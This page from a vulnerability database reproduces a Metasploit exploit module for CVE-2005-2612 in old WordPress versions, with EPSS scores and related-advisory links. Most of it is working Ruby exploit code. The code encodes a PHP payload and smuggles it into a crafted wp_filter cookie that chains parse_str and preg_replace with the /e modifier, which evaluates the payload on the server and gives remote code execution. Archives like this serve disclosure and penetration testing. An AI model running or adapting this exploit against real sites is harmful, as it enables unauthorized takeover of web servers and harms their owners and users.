Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormStr0kePACKETSTORM:82365
HistoryOct 30, 2009 - 12:00 a.m.

WordPress cache_lastpostdate Arbitrary Code Execution

2009-10-3000:00:00
str0ke
packetstormsecurity.com
23

0.127 Low

EPSS

Percentile

94.9%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'WordPress cache_lastpostdate Arbitrary Code Execution',  
'Description' => %q{  
This module exploits an arbitrary PHP code execution flaw in the WordPress  
blogging software. This vulnerability is only present when the PHP 'register_globals'  
option is enabled (common for hosting providers). All versions of WordPress prior to  
1.5.1.3 are affected.  
},  
'Author' => [ 'str0ke <str0ke [at] milw0rm.com>', 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2005-2612'],  
['OSVDB', '18672'],  
['BID', '14533'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Compat' =>   
{  
'ConnectionType' => 'find',  
},  
'Space' => 512,  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Aug 9 2005',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "The full URI path to WordPress", "/"]),  
], self.class)  
end  
  
def exploit  
  
enc = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"  
str = Rex::Text.encode_base64('args[0]=eval(base64_decode('+enc+')).die()&args[1]=x')  
data =  
"wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;"+  
"wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;"+  
"cache_lastpostmodified[server]=//e;cache_lastpostdate[server]="+str+  
";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;"+  
"wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;"+  
"wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"  
  
# Trigger the command execution bug  
res = send_request_cgi({  
'uri' => datastore['URI'],  
'cookie' => data  
}, 25)   
  
if (res)  
print_status("The server returned: #{res.code} #{res.message}")  
else  
print_status("No response from the server")  
end  
end  
  
end  
  
`

Related

ubuntucve 1
patchstack 1
cve 1
debiancve 1
wpvulndb 1
packetstorm 1
nessus 1
ubuntucve
ubuntucve
CVE-2005-2612
2005-08-17 00:00:00
patchstack
patchstack
WordPress cache_lastpostdate - Arbitrary Code Execution
2010-07-03 00:00:00
cve
cve
CVE-2005-2612
2005-08-17 04:00:00
debiancve
debiancve
CVE-2005-2612
2005-08-17 04:00:00
wpvulndb
wpvulndb
Wordpress <= 1.5.1.3 - Remote Code Execution
2014-08-01 00:00:00
packetstorm
packetstorm
WordPress cache_lastpostdate Arbitrary Code Execution
2015-03-24 00:00:00
nessus
nessus
WordPress Cookie 'cache_lastpostdate' Parameter PHP Code Injection
2005-08-11 00:00:00

0.127 Low

EPSS

Percentile

94.9%

JSON
Related for PACKETSTORM:82365
ubuntucve1patchstack1cve1debiancve1wpvulndb1packetstorm1nessus1